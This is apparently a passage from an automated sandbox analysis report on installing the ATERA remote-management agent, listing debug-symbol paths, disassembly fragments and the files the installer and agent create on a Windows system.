                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdb source: AgentPackageInternalPoller.exe, 00000039.00000002.2751650874.000001AA64032000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: m\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2772634383.00000000028C7000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp
                                Source: Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp
                                Source: Binary string: /_/src/Polly/obj/Release/net461/Polly.pdbSHA256I5 source: AgentPackageOsUpdates.exe, 00000034.00000002.2818037392.000001FC60622000.00000002.00000001.01000000.0000003F.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller\obj\Release\AgentPackageRuntimeInstaller.pdb source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllt.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System.pdb source: rundll32.exe, 0000003B.00000002.2778902999.00000000070D0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000025.00000002.2366091778.000001D722932000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000014.00000002.2186532729.00000167D18B2000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2778902999.00000000070F7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000003.2771430754.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDA1000.00000004.00000020.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2819380529.000001FC60824000.00000004.00000020.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2819380529.000001FC6084E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\System.pdb source: rundll32.exe, 0000003B.00000003.2770793562.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773621288.0000000002C43000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60AA9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1975610817.0000016E75E12000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates.Common\obj\Release\AgentPackageOsUpdates.Common.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2787380704.000001FC47D22000.00000002.00000001.01000000.0000003C.sdmp
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbot source: rundll32.exe, 0000003B.00000003.2770950879.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1975610817.0000016E75E12000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2377234109.000001D73B812000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdb source: AgentPackageTicketing.exe, 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmp
                                Source: Binary string: ent.pdb0P&F source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: .pdbesI source: AgentPackageOsUpdates.exe, 00000034.00000002.2819380529.000001FC6076A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 00000039.00000002.2735782031.000001AA4B8B2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb* source: rundll32.exe, 0000003B.00000003.2771430754.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mC:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2772634383.00000000028C7000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 00000032.00000000.2625128438.00000277DF3C2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Newtonsoft.Json.dll.1.drStatic PE information: 0xD67DB044 [Thu Jan 13 00:22:28 2084 UTC]
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1891910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,37_2_00007FFDF1891910
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_074F4ECF push dword ptr [esp+ecx*2-75h]; ret 4_3_074F4ED3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B430AD8 pushad ; ret 16_2_00007FFD9B430AE1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B6202C1 push eax; ret 16_2_00007FFD9B6202E4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B620AF1 push eax; ret 16_2_00007FFD9B620B14
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B62180C push eax; ret 16_2_00007FFD9B621824
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFD9B625E84 push eax; ret 16_2_00007FFD9B625EB4
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D57B8 push es; ret 19_3_068D5840
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D4E90 push es; ret 19_3_068D4EA0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068DAEBF push es; retn 0696h19_3_068DAEDC
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D6BF1 push es; ret 19_3_068D6C00
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D6880 push es; ret 19_3_068D6890
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068DD1A1 push es; ret 19_3_068DD1B0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068DDDC0 push es; ret 19_3_068DDDD0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D5890 push es; ret 19_3_068D58A0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D58B0 push es; ret 19_3_068D58C0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D58D3 push es; ret 19_3_068D58E0
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D58F0 push es; ret 19_3_068D5940
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D5850 push es; ret 19_3_068D5860
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D5870 push es; ret 19_3_068D5880
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_068D5953 push es; ret 19_3_068D5960
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_069C4ECF push dword ptr [esp+ecx*2-75h]; ret 19_3_069C4ED3
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_069C18F0 push es; ret 19_3_069C1900
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFD9B3F00BD pushad ; iretd 20_2_00007FFD9B3F00C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 21_2_00007FFD9B3E00BD pushad ; iretd 21_2_00007FFD9B3E00C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFD9B3D00BD pushad ; iretd 24_2_00007FFD9B3D00C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3E2DFA push FFFFFFE8h; retf 26_2_00007FFD9B3E2EF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3DCC5D push FFFFFFE8h; retf 26_2_00007FFD9B3DCEF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3DCC60 push FFFFFFE8h; retf 26_2_00007FFD9B3DCEF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3DCC98 push FFFFFFE8h; retf 26_2_00007FFD9B3DCEF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3DCC8D push FFFFFFE8h; retf 26_2_00007FFD9B3DCEF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFD9B3DCC90 push FFFFFFE8h; retf 26_2_00007FFD9B3DCEF1

                                Persistence and Installation Behavior

                                barindex
                                Creates files in the system32 config directory
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageOsUpdates.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 442ad9.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4C16.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI46E3.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI7BC1.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
